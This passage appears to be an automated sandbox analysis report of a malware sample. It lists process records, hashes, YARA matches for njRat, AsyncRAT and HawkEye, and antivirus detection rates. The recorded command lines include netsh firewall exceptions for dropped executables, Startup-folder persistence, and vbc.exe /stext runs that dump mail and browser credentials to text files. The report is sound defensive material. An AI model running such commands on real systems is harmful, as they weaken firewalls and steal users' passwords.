                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: MAL_Winnti_Sample_May18_1, Description: Detects malware sample from Burning Umbrella report - Generic Winnti Rule, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Brian Wallace @botnet_hunter
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 78%, Metadefender, Browse
                                                                                              • Detection: 83%, ReversingLabs
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:20:49:52
                                                                                              Start date:28/04/2021
                                                                                              Path:C:\Windows\System32\netsh.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE
                                                                                              Imagebase:0x7ff695dc0000
                                                                                              File size:92672 bytes
                                                                                              MD5 hash:98CC37BBF363A38834253E22C80A8F32
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate

                                                                                              General

                                                                                              Start time:20:49:52
                                                                                              Start date:28/04/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff61de10000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:20:49:55
                                                                                              Start date:28/04/2021
                                                                                              Path:C:\Windows\SysWOW64\netsh.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\pgr.exe' 'pgr.exe' ENABLE
                                                                                              Imagebase:0x9e0000
                                                                                              File size:82944 bytes
                                                                                              MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:20:49:56
                                                                                              Start date:28/04/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff61de10000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:20:50:02
                                                                                              Start date:28/04/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe'
                                                                                              Imagebase:0xa70000
                                                                                              File size:69632 bytes
                                                                                              MD5 hash:9B30598F8F05C46F8ABB22A4C2ABCC9E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, Author: Brian Wallace @botnet_hunter
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:20:50:20
                                                                                              Start date:28/04/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe'
                                                                                              Imagebase:0x6e0000
                                                                                              File size:48640 bytes
                                                                                              MD5 hash:6107D33B54A998C142311E55B3EC53D2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:20:50:48
                                                                                              Start date:28/04/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe'
                                                                                              Imagebase:0x8a0000
                                                                                              File size:532992 bytes
                                                                                              MD5 hash:5C0E9E0C72288F8B70BB68C0036ECB52
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000D.00000002.616200946.0000000008100000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000D.00000002.616252308.0000000008150000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Arnim Rupp
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: JPCERT/CC Incident Response Group
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:20:50:58
                                                                                              Start date:28/04/2021
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                                              Imagebase:0x400000
                                                                                              File size:1171592 bytes
                                                                                              MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:20:50:59
                                                                                              Start date:28/04/2021
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                                              Imagebase:0x400000
                                                                                              File size:1171592 bytes
                                                                                              MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              Reputation:high

                                                                                              Disassembly

                                                                                              Code Analysis

                                                                                              Reset < >